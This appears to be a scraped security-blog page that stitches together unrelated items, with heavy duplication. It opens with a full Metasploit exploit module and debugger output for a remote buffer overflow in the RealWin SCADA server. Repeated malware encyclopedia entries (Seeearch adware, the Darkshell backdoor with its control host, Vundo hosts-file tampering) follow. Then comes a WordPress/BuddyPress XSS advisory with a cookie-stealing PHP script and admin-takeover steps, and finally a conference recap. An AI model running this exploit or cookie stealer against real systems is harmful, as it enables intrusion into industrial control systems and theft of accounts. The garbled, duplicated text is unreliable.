##
# $Id: realwin_on_fc_binfile_a.rb 12975 2011-06-20 04:01:47Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in DATAC Control International RealWin
SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE
packet via port 910, RealWin will try to create a file (which would be saved to
C:Program FilesDATACReal WinRW-versionfilename) by first copying the user-
supplied filename with a inline memcpy routine without proper bounds checking, which
results a stack-based buffer overflow, allowing arbitrary remote code execution.
Tested version: 2.0 (Build 6.1.8.10)
},
'Author' => [ 'Luigi Auriemma', 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 12975 $',
'References' =>
[
[ 'URL', 'http://aluigi.altervista.org/adv/realwin_5-adv.txt' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 450,
'BadChars' => "x00x3ax26x3fx25x23x20x0ax0dx2fx2bx0bx5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Universal', { 'Ret' => 0x4002da21 } ], # P/P/R FlexMLang.DLL 8.1.45.19
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 21 2011'))
register_options([Opt::RPORT(910)], self.class)
end
def exploit
connect
data = [0x67542310].pack('V')
data << [0x00000824].pack('V')
data << [0x00100001].pack('V')
data << [0x00000001].pack('V') #Packet type
data << [0x00060000].pack('V')
data << [0x0000ffff].pack('V')
data << rand_text_alpha_upper(221)
data << generate_seh_payload(target.ret)
data << rand_text_alpha_upper(17706 - payload.encoded.length)
data << [0x451c3500].pack('V')
data << [0x00000154].pack('V')
data << [0x00020040].pack('V')
print_status("Trying target #{target.name}...")
sock.put(data)
select(nil,nil,nil,0.5)
handler
disconnect
end
end
=begin
0:022> r
eax=00000819 ebx=0587f89c ecx=00000039 edx=011fba04 esi=011fc138 edi=0587fffd
eip=0042702f esp=0587f738 ebp=011fba04 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
RealWinDemo+0x2702f:
0042702f f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:022> !exchain
0587f748: RealWinDemo+e0b78 (004e0b78)
0587f9a4: FlexMLang!GetFlexMLangIResourceBrowser+2b991 (4002da21)
Invalid exception stack at 49a206eb
0:022> u 4002da21
FlexMLang!GetFlexMLangIResourceBrowser+0x2b991:
4002da21 5e pop esi
4002da22 5b pop ebx
4002da23 c3 ret
=end
30 September 2011
realwin_on_fc_binfile_a.rb
27 September 2011
Program:Win32/Seeearch
Aliases :
Program:Win32/Seeearch is also known as Adware.VlcPlayer (Dr.Web), IsolationAware (Sophos).
Explanation :
Program:Win32/Seeearch is a web browser toolbar that may be bundled with a fake setup application named "Vlc Media Player".
Top
Program:Win32/Seeearch is a web browser toolbar that may be bundled with a fake setup application named "Vlc Media Player".
Installation
When run, the fake installer displays the following graphic: It also displays an End User License Agreement: The installer displays an error message such as the following: It then drops the following files:
Note : we observed that in the wild samples of Win32/Seeearch use the following folder locations as the "":
D:\%ProgramFiles%
The registry is modified to run Win32/Seeearch as a Browser Helper Object.
In subkey: HKLM\Software\Microsoft\Internet Explorer\Toolbar
Sets value: "{1FDA7DDD-25CE-4034-9D5B-38A120A14218}"
To data: ""
In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar.1
Sets value: "(default)"
To data: "ie toolbar"
In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar.1\CLSID
Sets value: "(default)"
To data: "{1fda7ddd-25ce-4034-9d5b-38a120a14218}"
In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar
Sets value: "(default)"
To data: "ie toolbar"
In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar\CLSID
Sets value: "(default)"
To data: "{1fda7ddd-25ce-4034-9d5b-38a120a14218}"
In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar\CurVer
Sets value: "(default)"
To data: "tbsb06155.ietoolbar.1"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}
Sets value: "(default)"
To data: "ie toolbar"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\ProgID
Sets value: "(default)"
To data: "tbsb06155.ietoolbar.1"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\VersionIndependentProgID
Sets value: "(default)"
To data: "tbsb06155.ietoolbar"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\InprocServer32
Sets value: "(default)"
To data: "\seeearch\seeearch.dll"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\TypeLib
Sets value: "(default)"
To data: "{80d04e8e-7448-4d36-9161-5f89bf18dfdd}"
In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155.1
Sets value: "(default)"
To data: "tbsb06155 class"
In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155.1\CLSID
Sets value: "(default)"
To data: "{2da14d1d-ae74-4a74-a0fe-c79504755db8}"
In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155
Sets value: "(default)"
To data: "tbsb06155 class"
In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155\CLSID
Sets value: "(default)"
To data: "{2da14d1d-ae74-4a74-a0fe-c79504755db8}"
In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155\CurVer
Sets value: "(default)"
To data: "toolbar3.tbsb06155.1"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}
Sets value: "(default)"
To data: "tbsb06155 class"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\ProgID
Sets value: "(default)"
To data: "toolbar3.tbsb06155.1"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\VersionIndependentProgID
Sets value: "(default)"
To data: "toolbar3.tbsb06155"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\InprocServer32
Sets value: "(default)"
To data: "\seeearch\seeearch.dll"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\TypeLib
Sets value: "(default)"
To data: "{80d04e8e-7448-4d36-9161-5f89bf18dfdd}"
In subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}
Sets value: "(default)"
To data: "tbsb06155"
In subkey: HKLM\SOFTWARE\Classes\TypeLib\{80D04E8E-7448-4D36-9161-5F89BF18DFDD}\1.0
Sets value: "(default)"
To data: "toolbar3 1.0 type library"
In subkey: HKLM\SOFTWARE\Classes\TypeLib\{80D04E8E-7448-4D36-9161-5F89BF18DFDD}\1.0\FLAGS
Sets value: "(default)"
To data: "0"
In subkey: HKLM\SOFTWARE\Classes\TypeLib\{80D04E8E-7448-4D36-9161-5F89BF18DFDD}\1.0\0\win32
Sets value: "(default)"
To data: "\seeearch\seeearch.dll"
In subkey: HKLM\SOFTWARE\Classes\TypeLib\{80D04E8E-7448-4D36-9161-5F89BF18DFDD}\1.0\HELPDIR
Sets value: "(default)"
To data: "\seeearch\"
In subkey: HKLM\SOFTWARE\Classes\Interface\{1BBB9F9A-8C7B-465B-827B-15C1B865E95C}
Sets value: "(default)"
To data: "itoolbarobj"
In subkey: HKLM\SOFTWARE\Classes\Interface\{1BBB9F9A-8C7B-465B-827B-15C1B865E95C}\ProxyStubClsid
Sets value: "(default)"
To data: "{00020424-0000-0000-c000-000000000046}"
In subkey: HKLM\SOFTWARE\Classes\Interface\{1BBB9F9A-8C7B-465B-827B-15C1B865E95C}\ProxyStubClsid32
Sets value: "(default)"
To data: "{00020424-0000-0000-c000-000000000046}"
In subkey: HKLM\SOFTWARE\Classes\Interface\{1BBB9F9A-8C7B-465B-827B-15C1B865E95C}\TypeLib
Sets value: "(default)"
To data: "{80d04e8e-7448-4d36-9161-5f89bf18dfdd}"
In subkey: HKLM\SOFTWARE\Classes\Interface\{7C5C05AE-CBB0-4AC3-BAA8-BADB08254386}
Sets value: "(default)"
To data: "iposbho"
In subkey: HKLM\SOFTWARE\Classes\Interface\{7C5C05AE-CBB0-4AC3-BAA8-BADB08254386}\ProxyStubClsid
Sets value: "(default)"
To data: "{00020424-0000-0000-c000-000000000046}"
In subkey: HKLM\SOFTWARE\Classes\Interface\{7C5C05AE-CBB0-4AC3-BAA8-BADB08254386}\ProxyStubClsid32
Sets value: "(default)"
To data: "{00020424-0000-0000-c000-000000000046}"
In subkey: HKLM\SOFTWARE\Classes\Interface\{7C5C05AE-CBB0-4AC3-BAA8-BADB08254386}\TypeLib
Sets value: "(default)"
To data: "{80d04e8e-7448-4d36-9161-5f89bf18dfdd}"
When the web browser Internet Explorer is launched, Win32/Seeearch is visible as a toolbar: Program:Win32/Seeearch may display 'out-of-context' popup advertisements.
Analysis by Jonathan San Jose
Baca Selengkapnya...
Program:Win32/Seeearch
Program:Win32/Seeearch is also known as Adware.VlcPlayer (Dr.Web), IsolationAware (Sophos).
Explanation :
Program:Win32/Seeearch is a web browser toolbar that may be bundled with a fake setup application named "Vlc Media Player".
Top
Program:Win32/Seeearch is a web browser toolbar that may be bundled with a fake setup application named "Vlc Media Player".
Installation
When run, the fake installer displays the following graphic: It also displays an End User License Agreement: The installer displays an error message such as the following: It then drops the following files:
\Seeearch\seeearch.crc
\Seeearch\seeearch.dll
\Seeearch\start.html
\Seeearch\tbhelper.dll
\Seeearch\uninstall.exe
\Seeearch\update.exe
\Seeearch\21_pro.png
\Seeearch\58tuto02.jpg
\Seeearch\about.html
\Seeearch\basis.xml
\Seeearch\bookmark_256.png
\Seeearch\c1.png
\Seeearch\c2.png
\Seeearch\demo_logo.bmp
\Seeearch\demo_logo.bmp_16.bmp
\Seeearch\dice.png
\Seeearch\error.html
\Seeearch\facebook.png
\Seeearch\facebooklay.png
\Seeearch\favicon.ico
\Seeearch\football.png
\Seeearch\google_youtube.png
\Seeearch\icons.bmp
\Seeearch\icon_news.jpg
\Seeearch\kpat.png
\Seeearch\kpat2.png
\Seeearch\label_new_blue.png
\Seeearch\label_new_red.png
\Seeearch\littlelogo.png
\Seeearch\log.bmp
\Seeearch\log.bmp_30.bmp
\Seeearch\logotool.png
\Seeearch\logotoolbar.png
\Seeearch\loupe.png
\Seeearch\megaupload.png
\Seeearch\meteo.png
\Seeearch\money.png
\Seeearch\movies.png
\Seeearch\p1.png
\Seeearch\p2.png
\Seeearch\play.png
\Seeearch\refre.png
\Seeearch\refresh.png
\Seeearch\search_button_format_bing.png
\Seeearch\sims2_1.png
\Seeearch\social_youtube.png
\Seeearch\STREAM1.png
\Seeearch\STREAM2.png
\Seeearch\tweet.png
\Seeearch\twitter.png
\Seeearch\v1.png
\Seeearch\v2.png
\Seeearch\version.txt
\Seeearch\video.png
\Seeearch\weather.png
\Seeearch\youtube.png
Note : we observed that in the wild samples of Win32/Seeearch use the following folder locations as the "":
D:\%ProgramFiles%
The registry is modified to run Win32/Seeearch as a Browser Helper Object.
In subkey: HKLM\Software\Microsoft\Internet Explorer\Toolbar
Sets value: "{1FDA7DDD-25CE-4034-9D5B-38A120A14218}"
To data: ""
In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar.1
Sets value: "(default)"
To data: "ie toolbar"
In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar.1\CLSID
Sets value: "(default)"
To data: "{1fda7ddd-25ce-4034-9d5b-38a120a14218}"
In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar
Sets value: "(default)"
To data: "ie toolbar"
In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar\CLSID
Sets value: "(default)"
To data: "{1fda7ddd-25ce-4034-9d5b-38a120a14218}"
In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar\CurVer
Sets value: "(default)"
To data: "tbsb06155.ietoolbar.1"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}
Sets value: "(default)"
To data: "ie toolbar"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\ProgID
Sets value: "(default)"
To data: "tbsb06155.ietoolbar.1"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\VersionIndependentProgID
Sets value: "(default)"
To data: "tbsb06155.ietoolbar"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\InprocServer32
Sets value: "(default)"
To data: "\seeearch\seeearch.dll"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\TypeLib
Sets value: "(default)"
To data: "{80d04e8e-7448-4d36-9161-5f89bf18dfdd}"
In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155.1
Sets value: "(default)"
To data: "tbsb06155 class"
In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155.1\CLSID
Sets value: "(default)"
To data: "{2da14d1d-ae74-4a74-a0fe-c79504755db8}"
In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155
Sets value: "(default)"
To data: "tbsb06155 class"
In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155\CLSID
Sets value: "(default)"
To data: "{2da14d1d-ae74-4a74-a0fe-c79504755db8}"
In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155\CurVer
Sets value: "(default)"
To data: "toolbar3.tbsb06155.1"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}
Sets value: "(default)"
To data: "tbsb06155 class"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\ProgID
Sets value: "(default)"
To data: "toolbar3.tbsb06155.1"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\VersionIndependentProgID
Sets value: "(default)"
To data: "toolbar3.tbsb06155"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\InprocServer32
Sets value: "(default)"
To data: "\seeearch\seeearch.dll"
In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\TypeLib
Sets value: "(default)"
To data: "{80d04e8e-7448-4d36-9161-5f89bf18dfdd}"
In subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}
Sets value: "(default)"
To data: "tbsb06155"
In subkey: HKLM\SOFTWARE\Classes\TypeLib\{80D04E8E-7448-4D36-9161-5F89BF18DFDD}\1.0
Sets value: "(default)"
To data: "toolbar3 1.0 type library"
In subkey: HKLM\SOFTWARE\Classes\TypeLib\{80D04E8E-7448-4D36-9161-5F89BF18DFDD}\1.0\FLAGS
Sets value: "(default)"
To data: "0"
In subkey: HKLM\SOFTWARE\Classes\TypeLib\{80D04E8E-7448-4D36-9161-5F89BF18DFDD}\1.0\0\win32
Sets value: "(default)"
To data: "\seeearch\seeearch.dll"
In subkey: HKLM\SOFTWARE\Classes\TypeLib\{80D04E8E-7448-4D36-9161-5F89BF18DFDD}\1.0\HELPDIR
Sets value: "(default)"
To data: "\seeearch\"
In subkey: HKLM\SOFTWARE\Classes\Interface\{1BBB9F9A-8C7B-465B-827B-15C1B865E95C}
Sets value: "(default)"
To data: "itoolbarobj"
In subkey: HKLM\SOFTWARE\Classes\Interface\{1BBB9F9A-8C7B-465B-827B-15C1B865E95C}\ProxyStubClsid
Sets value: "(default)"
To data: "{00020424-0000-0000-c000-000000000046}"
In subkey: HKLM\SOFTWARE\Classes\Interface\{1BBB9F9A-8C7B-465B-827B-15C1B865E95C}\ProxyStubClsid32
Sets value: "(default)"
To data: "{00020424-0000-0000-c000-000000000046}"
In subkey: HKLM\SOFTWARE\Classes\Interface\{1BBB9F9A-8C7B-465B-827B-15C1B865E95C}\TypeLib
Sets value: "(default)"
To data: "{80d04e8e-7448-4d36-9161-5f89bf18dfdd}"
In subkey: HKLM\SOFTWARE\Classes\Interface\{7C5C05AE-CBB0-4AC3-BAA8-BADB08254386}
Sets value: "(default)"
To data: "iposbho"
In subkey: HKLM\SOFTWARE\Classes\Interface\{7C5C05AE-CBB0-4AC3-BAA8-BADB08254386}\ProxyStubClsid
Sets value: "(default)"
To data: "{00020424-0000-0000-c000-000000000046}"
In subkey: HKLM\SOFTWARE\Classes\Interface\{7C5C05AE-CBB0-4AC3-BAA8-BADB08254386}\ProxyStubClsid32
Sets value: "(default)"
To data: "{00020424-0000-0000-c000-000000000046}"
In subkey: HKLM\SOFTWARE\Classes\Interface\{7C5C05AE-CBB0-4AC3-BAA8-BADB08254386}\TypeLib
Sets value: "(default)"
To data: "{80d04e8e-7448-4d36-9161-5f89bf18dfdd}"
When the web browser Internet Explorer is launched, Win32/Seeearch is visible as a toolbar: Program:Win32/Seeearch may display 'out-of-context' popup advertisements.
Analysis by Jonathan San Jose
Backdoor:Win32/Darkshell.B
Aliases :
There are no other names known for Backdoor : Win32/Darkshell.B.
Explanation :
Backdoor:Win32/Darkshell.B is a backdoor trojan that infects executable files and spreads through removable drives, as well as contacting a remote host in order to perform further malicious actions on the compromised computer.
Top
Backdoor:Win32/Darkshell.B is a backdoor trojan that infects executable files and spreads through removable drives, as well as contacting a remote host in order to perform further malicious actions on the compromised computer.
Installation
Upon execution, Backdoor:Win32/Darkshell.B creates a copy of itself in the following file location and registers this copy as a service so it runs at each Windows start:
\drivers\svchost.exe
Win32/Darkshell.B then launches this copy and deletes its original executable from the computer.
The backdoor also creates copies of itself in the following file locations using randomly generated file names:
\.exe
\drivers\.exe
\dllcache\.exe
\ime\.exe
%ProgramFiles%\common files\microsoft shared\.exe
%ProgramFiles%\internet explorer\connection wizard\.exe
%ProgramFiles%\windows media player\.exe
%windir%\addins\.exe
%windir%\system\.exe
Note: refers to a variable location that is determined by the malware by querying the Operating System. The default installation location for the System folder for Windows 2000 and NT is C:\Winnt\System32; and for XP, Vista, and 7 is C:\Windows\System32.
Spreads via...
Removable drives
Backdoor:Win32/Darkshell.B may receive instructions from a remote host to spread via removable drives. Darkshell.B may copy itself to any removable drives on the system using the file name "setup.exe", as well as creating an "autorun.inf" file in the drive that launches "setup.exe", if the Autorun feature is enabled on the compromised computer.
It should also be noted that autorun.inf files on their own are not necessarily a sign of infection, as they are used by legitimate programs and installation CDs.
Payload
Modifies executable files
Backdoor:Win32/Darkshell.B modifies files with ".exe" file extensions in all fixed drives so that when these files are launched, a copy of the malware is also executed. The modified files are detected as Virus:Win32/Luder.B. Backdoor:Win32/Darkshell.B avoids infecting files that are in the following directories:
\Windows
\WinNT
\Windows NT
\Documents and Settings
\System Volume Information
\Recycled
\WindowsUpdate
\Windows Media Player
\Outlook Express
\Internet Explorer
\NetMeeting
\ComPlus Applications
\Messenger
\Microsoft Frontpage
\Movie Maker
\NetMeeting
Contacts remote hosts
In the wild, we have observed Backdoor:Win32/Darkshell.B attempting to contact the following remote host through port 1981:
hackpigpig.3322.org
The malware parses information received from the host to interpret other host servers with which to connect. Darkshell also sends system information to the host such as the system's computer name, Windows version, and amount of RAM.
Darkshell may also receive commands from the host that allow it to perform a number of actions on the infected computer, such as:
Remove itself from the system
Download and execute files
Execute files
Spread through removable drives
Downloads and executes arbitrary files
Through its backdoor component, Win32/Darkshell.B may receive instructions to download and execute an arbitrary file from a specific URL. If ordered to do so, the backdoor saves the file to the file location "C:\pagefile.pif" and executes it.
Analysis by Amir Fouda
Baca Selengkapnya...
Backdoor:Win32/Darkshell.B
There are no other names known for Backdoor : Win32/Darkshell.B.
Explanation :
Backdoor:Win32/Darkshell.B is a backdoor trojan that infects executable files and spreads through removable drives, as well as contacting a remote host in order to perform further malicious actions on the compromised computer.
Top
Backdoor:Win32/Darkshell.B is a backdoor trojan that infects executable files and spreads through removable drives, as well as contacting a remote host in order to perform further malicious actions on the compromised computer.
Installation
Upon execution, Backdoor:Win32/Darkshell.B creates a copy of itself in the following file location and registers this copy as a service so it runs at each Windows start:
\drivers\svchost.exe
Win32/Darkshell.B then launches this copy and deletes its original executable from the computer.
The backdoor also creates copies of itself in the following file locations using randomly generated file names:
\.exe
\drivers\.exe
\dllcache\.exe
\ime\.exe
%ProgramFiles%\common files\microsoft shared\.exe
%ProgramFiles%\internet explorer\connection wizard\.exe
%ProgramFiles%\windows media player\.exe
%windir%\addins\.exe
%windir%\system\.exe
Note: refers to a variable location that is determined by the malware by querying the Operating System. The default installation location for the System folder for Windows 2000 and NT is C:\Winnt\System32; and for XP, Vista, and 7 is C:\Windows\System32.
Spreads via...
Removable drives
Backdoor:Win32/Darkshell.B may receive instructions from a remote host to spread via removable drives. Darkshell.B may copy itself to any removable drives on the system using the file name "setup.exe", as well as creating an "autorun.inf" file in the drive that launches "setup.exe", if the Autorun feature is enabled on the compromised computer.
It should also be noted that autorun.inf files on their own are not necessarily a sign of infection, as they are used by legitimate programs and installation CDs.
Payload
Modifies executable files
Backdoor:Win32/Darkshell.B modifies files with ".exe" file extensions in all fixed drives so that when these files are launched, a copy of the malware is also executed. The modified files are detected as Virus:Win32/Luder.B. Backdoor:Win32/Darkshell.B avoids infecting files that are in the following directories:
\Windows
\WinNT
\Windows NT
\Documents and Settings
\System Volume Information
\Recycled
\WindowsUpdate
\Windows Media Player
\Outlook Express
\Internet Explorer
\NetMeeting
\ComPlus Applications
\Messenger
\Microsoft Frontpage
\Movie Maker
\NetMeeting
Contacts remote hosts
In the wild, we have observed Backdoor:Win32/Darkshell.B attempting to contact the following remote host through port 1981:
hackpigpig.3322.org
The malware parses information received from the host to interpret other host servers with which to connect. Darkshell also sends system information to the host such as the system's computer name, Windows version, and amount of RAM.
Darkshell may also receive commands from the host that allow it to perform a number of actions on the infected computer, such as:
Remove itself from the system
Download and execute files
Execute files
Spread through removable drives
Downloads and executes arbitrary files
Through its backdoor component, Win32/Darkshell.B may receive instructions to download and execute an arbitrary file from a specific URL. If ordered to do so, the backdoor saves the file to the file location "C:\pagefile.pif" and executes it.
Analysis by Amir Fouda
TrojanDropper:Win32/Vundo.L
Aliases :
TrojanDropper:Win32/Vundo.L is also known as Trojan-Downloader.Win32.Wadolin (Ikarus), Infostealer.Gampass (Symantec).
Explanation :
TrojanDropper:Win32/Vundo.L is a trojan that is a member of a multi-component family of programs that deliver 'out of context' pop-up advertisements. It also drops files that are capable of downloading other malware.
Top
TrojanDropper:Win32/Vundo.L is a trojan that is a member of a multi-component family of programs that deliver 'out of context' pop-up advertisements. It also drops files that are capable of downloading other malware.
Installation
TrojanDropper:Win32/Vundo.L drops a copy of itself as '\microsoft update.exe'.
Note: refers to a variable location that is determined by the malware by querying the Operating System. The default installation location for the Startup folder for Windows 9x, Me, NT, 2000, XP and 2003 is '%USERPROFILE%\Start Menu\Programs\Startup'. For Windows Vista and 7, the default location is '%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'.
Payload
Drops files
The trojan drops '%TEMP%\mw.exe', which is detected as Trojan:Win32/Vundo.OD. It also drops '%TEMP%\.tmp.exe', which is detected as TrojanDownloader:Win32/Wadolin.A.
Opens a message box
TrojanDropper:Win32/Vundo.L shows a misleading message box to trick the users into believing that it failed to run because of a missing OCX file.
Changes Hosts file and its contents
The trojan makes a copy of the Windows Hosts file to '\drivers\etc\hîsts'. Note that the second character of the file name is the extended ASCII character 'EEh'.
It then adds the following lines to the Hosts file to divert access from the Russian social networking site "vKontacte.ru" to another IP address:
vkontakte.ru = 92.38.209.252
vk.com = 92.38.209.252
TrojanDropper:Win32/Vundo.L also sets the "hidden" attribute on the Hosts file, and inserts a lot of empty lines into the Hosts file to make it look unchanged upon casual inspection.
Analysis by Horea Coroiu
Baca Selengkapnya...
TrojanDropper:Win32/Vundo.L
TrojanDropper:Win32/Vundo.L is also known as Trojan-Downloader.Win32.Wadolin (Ikarus), Infostealer.Gampass (Symantec).
Explanation :
TrojanDropper:Win32/Vundo.L is a trojan that is a member of a multi-component family of programs that deliver 'out of context' pop-up advertisements. It also drops files that are capable of downloading other malware.
Top
TrojanDropper:Win32/Vundo.L is a trojan that is a member of a multi-component family of programs that deliver 'out of context' pop-up advertisements. It also drops files that are capable of downloading other malware.
Installation
TrojanDropper:Win32/Vundo.L drops a copy of itself as '\microsoft update.exe'.
Note: refers to a variable location that is determined by the malware by querying the Operating System. The default installation location for the Startup folder for Windows 9x, Me, NT, 2000, XP and 2003 is '%USERPROFILE%\Start Menu\Programs\Startup'. For Windows Vista and 7, the default location is '%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'.
Payload
Drops files
The trojan drops '%TEMP%\mw.exe', which is detected as Trojan:Win32/Vundo.OD. It also drops '%TEMP%\.tmp.exe', which is detected as TrojanDownloader:Win32/Wadolin.A.
Opens a message box
TrojanDropper:Win32/Vundo.L shows a misleading message box to trick the users into believing that it failed to run because of a missing OCX file.
Changes Hosts file and its contents
The trojan makes a copy of the Windows Hosts file to '\drivers\etc\hîsts'. Note that the second character of the file name is the extended ASCII character 'EEh'.
It then adds the following lines to the Hosts file to divert access from the Russian social networking site "vKontacte.ru" to another IP address:
vkontakte.ru = 92.38.209.252
vk.com = 92.38.209.252
TrojanDropper:Win32/Vundo.L also sets the "hidden" attribute on the Hosts file, and inserts a lot of empty lines into the Hosts file to make it look unchanged upon casual inspection.
Analysis by Horea Coroiu
Wordpress + Buddypress + Blogs Mu theme = XSS to Super Admin to Server Compromise
Wordpress + Buddypress + Blogs Mu theme = XSS to Super Admin to Server Compromise
----------------------------------------------------------------------------------
Cross-site scripting (XSS) vulnerabilities tend to be seen as one of the less serious security issues. Sometimes XSS can be serious, leading to complete server compromise...
Severity: High
Vulnerable setup:
PHP<=5.2 (tested on CentOS 5), Wordpress<=3.1.4, Buddypress<=1.2.10 (with bbPress forum integrated), Blogs Mu theme<=1.2.6
Victim box's IP:
192.168.0.11
Attacker box's IP:
192.168.0.4
By registering to the Wordpress site as a regular 'subscriber' (here I use 'regularuser' as the username), and then signing in, it is possible to submit the
following javascript to the page at http://192.168.0.11/members/regularuser/settings/profile-css/ (in my test), the page can also be accessed via the themes bar at the top of the page:
The xss.php script looks as follows, and simply dumps the user cookies
of whichever user visits the
http://192.168.0.11/members/regularuser/profile/ page (social engineering can be used to get particular users to visit this page):
$usercookies = fopen('cookies/cookies.txt', 'a');
fwrite($usercookies, "Site|Username|Page: " . urldecode($_GET['t']) .
" " . "Cookie: " . urldecode($_GET['c']) . "
");
fclose($usercookies);
?>
Opening the 'cookies/cookies.txt' file reveals the following
information (after the Wordpress super administrator has signed in and then
viewed the public profile for 'regularuser'):
Site|Username|Page: test site | regularuser | Profile Cookie:
wordpress_test_cookie=WP Cookie check;
wordpress_logged_in_726e7da47eca03ddcae3e5e5966ad0d1=admin|1316627756|7c845a1bcf61927d4572ae0836ad7df4
By signing in as 'regularuser' and then editing his existing cookie to 'wordpress_logged_in_726e7da47eca03ddcae3e5e5966ad0d1' with the value
'admin|1316627756|7c845a1bcf61927d4572ae0836ad7df4', the attacker has completely compromised the Buddypress components of the Wordpress installation, essentially signing in as the super administrator, and being able to do anything the administrator can do via Buddypress (for example, sending messages to all users of the Wordpress site).
Further, it is possible to completely compromise the Wordpress installation by then going to:
http://192.168.0.11/members/admin/settings/general/
And changing the administrator password, after which going to:
http://192.168.0.11/wp-admin/
Allows the attacker to control the whole Wordpress site as the super administrator (without even entering the new password).
By editing PHP files within the Wordpress directory tree, PHP shells or backdoors can be added, compromising the server.
To defend against this simply upgrade outdated installations of Wordpress, Buddypress and the Blogs MU theme.
Timeline:
19 September 2011: vendor notified.
<=23 September 2011: Buddypress updated to 1.5 and Blogs Mu theme updated to 1.2.7, issues fixed.
03 August 2011
Nullcon dwitiya 2011
Hey folks,
I had a great time attending nullcon 2011, 2 days of sheer fun, knowledge and networking. Met a lot of people, got to know them personally, especially those whom I had met only through IRC’s. A nice ambience at “The retreat” Zuri, beach resort, which come in utor doxi, pedda, varca, salcette.
The food was great, the t-shirt even better and finally the CPE which we got, at the end of the 2nd day, all added to those small gains I had which can turn into big ones. Will be indebted to basu bhai, who helped us a lot, and in all it was gr8 experience. Here’s an article I am presenting to you which ll give you a glimpse of nullcon..A lot more to be covered, but, currently, only so much.
Nullcon(http://nullcon.net) Dwitiya witnessed action worth following—whether it is the Desi Jugaad track on Hacking the Parliament or demystifying the Zeus man in the middle attack on cell phones. Get into the thick of all the action at nullcon Day Zero with our vignette series.
